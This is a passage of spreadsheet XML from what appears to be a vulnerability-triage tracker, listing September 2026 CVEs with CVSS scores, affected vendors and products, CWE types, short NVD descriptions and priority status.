        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P253" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q253" s="5" t="inlineStr"/>
      <c r="R253" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S253" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81955</t>
        </is>
      </c>
    </row>
    <row r="254">
      <c r="A254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B254" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="D254" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F254" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G254" s="5" t="inlineStr"/>
      <c r="H254" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I254" s="5" t="inlineStr"/>
      <c r="J254" s="5" t="inlineStr"/>
      <c r="K254" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L254" s="5" t="inlineStr"/>
      <c r="M254" s="5" t="inlineStr"/>
      <c r="N254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P254" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q254" s="5" t="inlineStr"/>
      <c r="R254" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S254"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T254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="255">
      <c r="A255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B255" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82536</t>
        </is>
      </c>
      <c r="D255" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G255" s="5" t="inlineStr"/>
      <c r="H255" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I255" s="5" t="inlineStr"/>
      <c r="J255" s="5" t="inlineStr"/>
      <c r="K255" s="5" t="inlineStr"/>
      <c r="L255" s="5" t="inlineStr"/>
      <c r="M255" s="5" t="inlineStr"/>
      <c r="N255" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P255" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q255" s="5" t="inlineStr"/>
      <c r="R255" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S255" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t>
        </is>
      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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7" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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8" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83998</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr"/>
      <c r="K259" s="5" t="inlineStr"/>
      <c r="L259" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr"/>
      <c r="K260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="L260" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S261"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261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86083</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S262"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262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86730</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2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12611</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33197</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>biossecurity@ami.com</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="S266"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T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62648</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62649</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr"/>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62650</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62650</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73314</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-754</t>
        </is>
      </c>
      <c r="S270"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T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73314</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73316</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
      <c r="K271" s="5" t="inlineStr">
        <is>
          <t>xenforo:xenforo</t>
        </is>
      </c>
      <c r="L271" s="5" t="inlineStr"/>
      <c r="M271" s="5" t="inlineStr"/>
      <c r="N271" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P271" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q271" s="5" t="inlineStr"/>
      <c r="R271" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="S271"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T271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73316</t>
        </is>
      </c>
    </row>
    <row r="272">
      <c r="A272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B272" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77111</t>
        </is>
      </c>
      <c r="D272" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F272" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G272" s="5" t="inlineStr"/>
      <c r="H272" s="5" t="n">
        <v>0.005</v>
